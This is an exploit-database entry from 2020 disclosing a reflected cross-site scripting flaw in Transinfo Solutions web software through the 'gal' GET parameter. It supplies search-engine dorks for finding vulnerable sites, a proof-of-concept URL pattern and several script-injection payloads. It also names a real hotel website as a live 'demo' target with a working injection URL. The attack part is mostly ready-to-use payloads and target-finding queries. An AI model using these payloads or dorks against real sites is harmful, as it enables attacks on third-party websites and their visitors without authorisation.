Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-79 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
N/A | High | Remote | 2020-05-04 |
[+] Title: Transinfo Solutions Cross Site Scripting (XSS) [+] date:2020-05-04 [+] Author: h4shur [+] Vendor Homepage: transinfosolutions.com [+] Software Link: transinfosolutions.com [+] Tested on: Windows 10 & Google Chrome [+] Vulnerable File: gal= [+] Vulnerable Parameter: Get Method [+} Dorks : intext:"Powered By: Transinfo Solutions" intext:"Powered By: Transinfo Solutions" inurl:.php?id= intext:"Powered By: Transinfo Solutions" inurl:gal= ### POC: [+} site.com/[page].php?id=&gal=[XSS]&action=pic ### Xss Alert Code: "><svg onload=alert()> '><script>alert('');</script> <IMG "'"><script>alert()</script>'> And Etc. ### Demo: [+] http://hotelspringburn.com/gallery.php?id=2&gal=<script>alert('h4shur')</script>&action=pic ### Contact Me : * Telegram : @h4shur * Email : [email protected] * Instagram : @netedit0r * twitter : @h4shur
Copyright ©2024 Exploitalert.